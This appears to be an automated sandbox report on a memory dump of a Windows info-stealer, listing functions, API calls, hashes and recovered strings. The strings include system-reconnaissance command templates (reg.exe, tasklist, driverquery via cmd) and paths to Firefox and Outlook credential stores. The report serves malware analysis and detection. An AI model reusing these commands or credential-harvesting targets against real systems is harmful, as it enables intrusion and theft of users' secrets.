Opcode ID: 8413866e9637abdb74d03fa9360200baf1dcdddedcd41207031e2adfa7ec2d26
Instruction ID: 8576f651d523ed5a5f84061258941084040bd640193c60413aff66c3e57918ad
Opcode Fuzzy Hash: 8413866e9637abdb74d03fa9360200baf1dcdddedcd41207031e2adfa7ec2d26
Instruction Fuzzy Hash: E711F1B21007069FDB50EBBDEC84E6A73ECEB45B847090565F51AC7225D770E94A8B70

Uniqueness

Uniqueness Score: -1.00%

Function 00C99E9F, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,00C948BE,00CB1A07,00000057,00000000,?,?,?,00C96516,00000000,Scr), ref: 00C99EB5
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 00C99EC8
lstrcpy.KERNEL32(00000008,?), ref: 00C99EEA
GetLastError.KERNEL32(00CA328C,00000000,00000000,?,?,00C948BE,00CB1A07,00000057,00000000,?,?,?,00C96516,00000000,Scr,?), ref: 00C99F13
HeapFree.KERNEL32(00000000,00000000,?,?,00C948BE,00CB1A07,00000057,00000000,?,?,?,00C96516,00000000,Scr,?,?), ref: 00C99F2B
CloseHandle.KERNEL32(00000000,00CA328C,00000000,00000000,?,?,00C948BE,00CB1A07,00000057,00000000,?,?,?,00C96516,00000000,Scr), ref: 00C99F34

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 331ecb07572d5effe0c0a66bb67833612e3ae0a08f2fdf047da985843a9dfdde
Instruction ID: c12fcf5133c26b02cfa444cf1d83dbf111036240fbc7f459b55ac4440fe34aa6
Opcode Fuzzy Hash: 331ecb07572d5effe0c0a66bb67833612e3ae0a08f2fdf047da985843a9dfdde
Instruction Fuzzy Hash: E0118971504205EFDF109FA9DC8CAAEBBB8FB053A4B10452DF456C3150DB709D59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8800, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
GetCurrentThreadId.KERNEL32 ref: 00CA8838
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
lstrcpy.KERNEL32(00000000), ref: 00CA8874

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: dd9f28ff14f34a8e058cb1dfc22071100ea72e864adc010fdeade00f73ab9483
Instruction ID: fcd36b990a3e936662e16d8f9b4347e420fc2ea1d023b7bad7b5a9f454277d59
Opcode Fuzzy Hash: dd9f28ff14f34a8e058cb1dfc22071100ea72e864adc010fdeade00f73ab9483
Instruction Fuzzy Hash: 8401A1335001166BD7116BA5AC88F6F7BACEB82B84B480125BA15D3151DF74D909CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9299, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CA92F4
SetLastError.KERNEL32(00000000,?,?,?), ref: 00CA9348

Strings

vids, xrefs: 00CA9353

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 7adeed9087b6ed0e28f7796c393a02b75d56044e01a094a4449f75f09f296a7f
Instruction ID: bdeacba3be56f9670dbde831aed236bd65f4d3e361734ab5a368e5debc15b3be
Opcode Fuzzy Hash: 7adeed9087b6ed0e28f7796c393a02b75d56044e01a094a4449f75f09f296a7f
Instruction Fuzzy Hash: AE8108B1D0022A9FCF21DFA4D882AEDBBB9FF49714F10815AF415AB251D7709A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5EC0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CA5F6B
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 00CA5FD2
GetLastError.KERNEL32(?,00000000,00000000), ref: 00CA5FDC

Strings

P, xrefs: 00CA5F8F
K, xrefs: 00CA5F93

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: ce2b2a82ec9d6904a9324c65094a8a9bf4f44629e697df13d715e56487ec7b95
Instruction ID: 0bc70030e4771dc56e8cedf6d625cfbfd9c31353604b7bf88b6ec8bdc498f9e9
Opcode Fuzzy Hash: ce2b2a82ec9d6904a9324c65094a8a9bf4f44629e697df13d715e56487ec7b95
Instruction Fuzzy Hash: F2419371A00B069FDB24CFA4CE446AEBBF5BF15708F14892DE49693A40D335EA08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5745, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,00CA09E2,00000000,?,?,?,00CA09E2,?,?,?,?,?), ref: 00CA5783
lstrlen.KERNEL32(00CA09E2,?,?,?,00CA09E2,?,?,?,?,?), ref: 00CA5795
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 00CA5809
lstrlen.KERNEL32(00CA09E2,00000000,00000000,?,?,?,00CA09E2,?,?,?,?,?), ref: 00CA581E
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 00CA5837
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 00CA5840
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA584E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: f312d60672944de7cb1c8cac3932acd0372489b4cea1fa83d411782275ea21e7
Instruction ID: 228e48ad8dd79693a516a3b9ddd755d855d77251d9326005ae721f30588e74ed
Opcode Fuzzy Hash: f312d60672944de7cb1c8cac3932acd0372489b4cea1fa83d411782275ea21e7
Instruction Fuzzy Hash: 9B3116B280021AAFCF119F69DD429DE3FA8EF153A4F148025FC18A6211E735DE60DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C790, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA2891: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?,?), ref: 00CA289F

RtlAllocateHeap.NTDLL(00000000,?), ref: 00C9C7F1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C9C840

Part of subcall function 00CA4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00CA1ED8), ref: 00CA4282
Part of subcall function 00CA4241: GetLastError.KERNEL32 ref: 00CA428C
Part of subcall function 00CA4241: WaitForSingleObject.KERNEL32(000000C8), ref: 00CA42B1
Part of subcall function 00CA4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00CA42D2
Part of subcall function 00CA4241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00CA42FA
Part of subcall function 00CA4241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00CA430F
Part of subcall function 00CA4241: SetEndOfFile.KERNEL32(00000006), ref: 00CA431C
Part of subcall function 00CA4241: CloseHandle.KERNEL32(00000006), ref: 00CA4334

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,00CA314E,?,?,?,?,?,?), ref: 00C9C875
HeapFree.KERNEL32(00000000,?,?,?,?,00CA314E,?,?,?,?,?,?,00000000,?,00000000), ref: 00C9C885

Strings

https://, xrefs: 00C9C7A2

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: c26abbf2d3f0fc20c3183c3cb1b957dc1a11041c4769a70bb367870f387da8c9
Instruction ID: 51686dceac1e2c6760d4b97af13612477e8719f72247fa52644bc1c52dec331a
Opcode Fuzzy Hash: c26abbf2d3f0fc20c3183c3cb1b957dc1a11041c4769a70bb367870f387da8c9
Instruction Fuzzy Hash: A83114B6910019FFEB149BA4DC89EBEBB7DFB09384B100165F502E31A0DB71AE55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2639, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CAF750: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 00CAF78C
Part of subcall function 00CAF750: memset.NTDLL ref: 00CAF808
Part of subcall function 00CAF750: memset.NTDLL ref: 00CAF81D

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 00CB268D
lstrcmpi.KERNEL32(00000000,Main), ref: 00CB26AD
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00CB26F2
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,00000000), ref: 00CB2703

Strings

Main, xrefs: 00CB26A5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID: Main
API String ID: 1065503980-521822810
Opcode ID: 9f8cbda43edc0a09572072790376c409722ed21ca6e923831581f24121770a09
Instruction ID: a8d29e008ed016621e4eb979ace640511523b12b61b22a5ae44dcb5db4922d95
Opcode Fuzzy Hash: 9f8cbda43edc0a09572072790376c409722ed21ca6e923831581f24121770a09
Instruction Fuzzy Hash: C0217C35A00205FFDF21AFA4EC45BAE7B79EF05344F104564F911E6161DB319E19EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE9BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00000001), ref: 00CAE9CF
LoadLibraryA.KERNEL32(NTDSAPI.DLL,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CAEA69
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CAEA74

Strings

NTDLL.DLL, xrefs: 00CAE9CA
NTDSAPI.DLL, xrefs: 00CAEA62

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL
API String ID: 2140536961-3558519346
Opcode ID: 24997ef05fc126f477d95fe485d87278a5f82c5343653d9d534483da9e64fa0b
Instruction ID: 577a22c530b5bfa86a8565524ba6b8d6d898fba51a2034c42633ec72faacd312
Opcode Fuzzy Hash: 24997ef05fc126f477d95fe485d87278a5f82c5343653d9d534483da9e64fa0b
Instruction Fuzzy Hash: 0D317AB15043138FDB14CF29D444BAABBE0FF85319F04496DE89987251E770DA49CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00C9F4CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,?,00C96709,?,?,?,Salt,?,?,?,Store Root,?), ref: 00C9F4E1

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

mbstowcs.NTDLL ref: 00C9F4FD
lstrlen.KERNEL32(account{*}.oeaccount), ref: 00C9F50B
mbstowcs.NTDLL ref: 00C9F523

Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00CA88D9
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00CA88E5
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA892D
Part of subcall function 00CA888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8948
Part of subcall function 00CA888D: lstrlenW.KERNEL32(0000002C), ref: 00CA8980
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?), ref: 00CA8988
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA89AB
Part of subcall function 00CA888D: wcscpy.NTDLL ref: 00CA89BD

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

Strings

account{*}.oeaccount, xrefs: 00C9F505, 00C9F50A, 00C9F521

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: c9ba29cf7affa962862aa53adaef4c8530c76416ab00d019f7bd0c0af01d2617
Instruction ID: 059e3da6ac6445284de554c795879f0719857aea1dd1057a56159bbbe0060f9d
Opcode Fuzzy Hash: c9ba29cf7affa962862aa53adaef4c8530c76416ab00d019f7bd0c0af01d2617
Instruction Fuzzy Hash: 0B0192B2910215BBCF106BA5DC8AFDF7EACEB85354F104125B504E3151EB75DA05AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4406, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00CA4422
lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,00000000,?,00000000,64F16420,?,00C9B1B4,?,?,00000000,?,?), ref: 00CA4456
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000,?,00000000,64F16420,?,00C9B1B4,?,?,00000000,?,?,00000001,00000000), ref: 00CA4472

Strings

EMPTY, xrefs: 00CA4450, 00CA4455, 00CA445D
log, xrefs: 00CA445E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY$log
API String ID: 3886119090-141014656
Opcode ID: 00e1bcbe75246062724fd5212766214f3b6f43c8790211fe7bec6dc0a6be30c7
Instruction ID: a1a4b551b8d9429a6a478d2444b8cd154ea1fd0d9df876877bcbb0e681aee9ac
Opcode Fuzzy Hash: 00e1bcbe75246062724fd5212766214f3b6f43c8790211fe7bec6dc0a6be30c7
Instruction Fuzzy Hash: 0101A472600264BBDB21A7EAAC4CFEF7B6DEBCA7A4F200526F102D3110D6B14E45D671

Uniqueness

Uniqueness Score: -1.00%

Function 00CB427B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00CBE220,00C9C8D3,?,00000000), ref: 00CB427F
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00000000), ref: 00CB4293
GetProcAddress.KERNEL32(00000000), ref: 00CB429A

Strings

LdrRegisterDllNotification, xrefs: 00CB4289
NTDLL.DLL, xrefs: 00CB428E

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 1f216158129d21ea7ae77b9bc8f7c94b6026c87ebc59180ef08dda39b184aecb
Instruction ID: 2e92fe024a9d3dfd7e964075455f375433cd7504df4b3312cfa4bfab27c5b124
Opcode Fuzzy Hash: 1f216158129d21ea7ae77b9bc8f7c94b6026c87ebc59180ef08dda39b184aecb
Instruction Fuzzy Hash: 8701D2702443019FCB549FB99C89B997BE8AB06705F14C139F548C7262DB70C805CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00C98A10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00CBDF60,00000000), ref: 00C98A20
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00C98A3A
lstrcpy.KERNEL32(00000000,-01), ref: 00C98A5A
HeapFree.KERNEL32(00000000,00000000,00CBDF60,?,00000000,00000000,00000000,?,00000000,00CB0F94,00000000,00000000), ref: 00C98A7D

Part of subcall function 00CB59F7: SetEvent.KERNEL32(?,00C98A31,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A0B
Part of subcall function 00CB59F7: WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A25
Part of subcall function 00CB59F7: CloseHandle.KERNEL32(?,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A2E
Part of subcall function 00CB59F7: CloseHandle.KERNEL32(?,0000003C,?,00000000,00CB0F94,00000000,00000000), ref: 00CB5A3C
Part of subcall function 00CB59F7: RtlEnterCriticalSection.NTDLL(00000008), ref: 00CB5A48
Part of subcall function 00CB59F7: RtlLeaveCriticalSection.NTDLL(00000008), ref: 00CB5A71
Part of subcall function 00CB59F7: CloseHandle.KERNEL32(?), ref: 00CB5A8D
Part of subcall function 00CB59F7: LocalFree.KERNEL32(?), ref: 00CB5A9B
Part of subcall function 00CB59F7: RtlDeleteCriticalSection.NTDLL(00000008), ref: 00CB5AA5

Strings

-01, xrefs: 00C98A52

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: 5373bc282d594ffeaaa5b88c15ce151730ca857db27ed03f2a71dd3f793ee4c9
Instruction ID: cfbc0a71671d24d3b0ce670178cad9a2cb07f7519acd7bcd6e34aec84f6786ec
Opcode Fuzzy Hash: 5373bc282d594ffeaaa5b88c15ce151730ca857db27ed03f2a71dd3f793ee4c9
Instruction Fuzzy Hash: 25F0A4B26051187BDA203BE16C8CFBF7F5CE75A7E5F000225F20692150DE114C09D670

Uniqueness

Uniqueness Score: -1.00%

Function 00CA63E9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000000,747DF720,?,00C9A894,00000000,?,?,?,00CB25B8), ref: 00CA640D
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,00C9A894,00000000,?,?,?,00CB25B8), ref: 00CA6421
GetProcAddress.KERNEL32(00000000), ref: 00CA6428

Strings

LdrUnregisterDllNotification, xrefs: 00CA6417
NTDLL.DLL, xrefs: 00CA641C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrUnregisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3940208311
Opcode ID: cb2e175815305cfea3c776dd786d02c5d65dd385576602d860094a7c4f96ffc9
Instruction ID: 6d120396b7c37e82d2647af34a5332cce63de66d51a6451616a225d4eea65b4e
Opcode Fuzzy Hash: cb2e175815305cfea3c776dd786d02c5d65dd385576602d860094a7c4f96ffc9
Instruction Fuzzy Hash: BF01A2751012019FCB149F68EC88B6ABBACEB4A708B188429E12597321CB31AD06CA20

Uniqueness

Uniqueness Score: -1.00%

Function 00C94B29, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00C9F1E8,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 00C94B2E
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00C94B43
wsprintfA.USER32 ref: 00C94B58

Part of subcall function 00C9B598: memset.NTDLL ref: 00C9B5AD
Part of subcall function 00C9B598: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 00C9B5E6
Part of subcall function 00C9B598: wcstombs.NTDLL ref: 00C9B5F0
Part of subcall function 00C9B598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 00C9B621
Part of subcall function 00C9B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00CA793E), ref: 00C9B64D
Part of subcall function 00C9B598: TerminateProcess.KERNEL32(?,000003E5), ref: 00C9B663
Part of subcall function 00C9B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00CA793E), ref: 00C9B677
Part of subcall function 00C9B598: CloseHandle.KERNEL32(?), ref: 00C9B6AA
Part of subcall function 00C9B598: CloseHandle.KERNEL32(?), ref: 00C9B6AF

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00C94B74

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 00C94B52

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: 3f2da754d9f78ac4e22d8816dab0aa1c24c9ed28f37e23a9f223c41e778e561d
Instruction ID: 80c1d039236fc3f08c30cdf9681b881f79f313684d31d4cb3ab950baacd00f33
Opcode Fuzzy Hash: 3f2da754d9f78ac4e22d8816dab0aa1c24c9ed28f37e23a9f223c41e778e561d
Instruction Fuzzy Hash: 54F08C316445107BCA25272ABC0DF6F7F6CDBC2B65F150224F506E52E0DB208D0AC5A4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA447F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,.dll,?,00000000,00C9A218,?,.dll,?,00001000,?,?,?), ref: 00CA448D
lstrlen.KERNEL32(DllRegisterServer), ref: 00CA449B
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00CA44B0

Strings

DllRegisterServer, xrefs: 00CA4493, 00CA4498, 00CA44C1
.dll, xrefs: 00CA448B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: bec2bae4aed3600358506c1cdb5d33fb03f729050394d2abc81463a5286e5335
Instruction ID: 10b41b8ac40b4283481a0d6e29c141b7dbdfde8630bde761b69f8c53a11757df
Opcode Fuzzy Hash: bec2bae4aed3600358506c1cdb5d33fb03f729050394d2abc81463a5286e5335
Instruction Fuzzy Hash: CCF0E973501111ABC3209BA8EC88F5BBBACEB49745B040225FA06D3221DA309C14C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9F675, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00C9F67E
Sleep.KERNEL32(0000000A,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C9F688
HeapFree.KERNEL32(00000000,?,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C9F6B6
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00C9F6CB

Strings

0123456789ABCDEF, xrefs: 00C9F6A5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: 5240a13108ecc259d3a0e58fb412c3e5734aea757d59fb80e3701ecb1595fb85
Instruction ID: a14f683e23204e014ab7695322971084180396ee2f9f524d00f14e33723bfe79
Opcode Fuzzy Hash: 5240a13108ecc259d3a0e58fb412c3e5734aea757d59fb80e3701ecb1595fb85
Instruction Fuzzy Hash: B1F0D4742002009BEB089B58ED99BAE37A9AB04741F14422EFA02D73B1DB30AD05CA26

Uniqueness

Uniqueness Score: -1.00%

Function 00C9D570, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA0DCC: ExpandEnvironmentStringsW.KERNEL32( Fw,00000000,00000000,00000000,77E34620,00000000,00C95FE6,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00CA0DDD
Part of subcall function 00CA0DCC: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00C923FE), ref: 00CA0DFA

lstrlenW.KERNEL32(00000000,00000000,761506E0,00000020,00750025,80000001), ref: 00C9D5B6
lstrlenW.KERNEL32(00000008), ref: 00C9D5BD
lstrlenW.KERNEL32(?,?), ref: 00C9D5D9
lstrlen.KERNEL32(?,006F0070,00000000), ref: 00C9D653
lstrlenW.KERNEL32(?), ref: 00C9D65F
wsprintfA.USER32 ref: 00C9D68D

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 22d3caf892fd9639eb05b20de4fda97da2652d630d1751e2122c953d47a99686
Instruction ID: 96bdd4ae27c646a937b356a2ad6213854cb19f40df3325825978b6852018dadf
Opcode Fuzzy Hash: 22d3caf892fd9639eb05b20de4fda97da2652d630d1751e2122c953d47a99686
Instruction Fuzzy Hash: 25411CB2900109EFCF01AFA8DC45EAE7BBDEF45304F054455F915A7222DB71EA14AF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4670, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C97D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00CA1117), ref: 00C97D13
Part of subcall function 00C97D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00C97D71
Part of subcall function 00C97D07: lstrcpy.KERNEL32(00000000,00000000), ref: 00C97D81

lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 00CB46BF
wsprintfA.USER32 ref: 00CB46EF
GetLastError.KERNEL32 ref: 00CB4764

Strings

Content-Type: application/octet-stream, xrefs: 00CB46E3
`, xrefs: 00CB4720

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 324226357-1382853987
Opcode ID: 791011b28cd9c0b76dc18de0deb0a7e4715cfe1dedd05b4aa1a02b85135fad3f
Instruction ID: 947106bb0b60a2895821e76e87701f0f3f1fd2967693c9996259abda616288fe
Opcode Fuzzy Hash: 791011b28cd9c0b76dc18de0deb0a7e4715cfe1dedd05b4aa1a02b85135fad3f
Instruction Fuzzy Hash: DD31D17110020AAFCF11AF61DC85FEB77ACEF51354F104129F965A6261EB70EA18CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA39D7, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CAB01E: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 00CAB02A
Part of subcall function 00CAB01E: SetLastError.KERNEL32(000000B7,?,00CA39EB,?,?,00000000,?,?,?), ref: 00CAB03B

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00CA3A0B
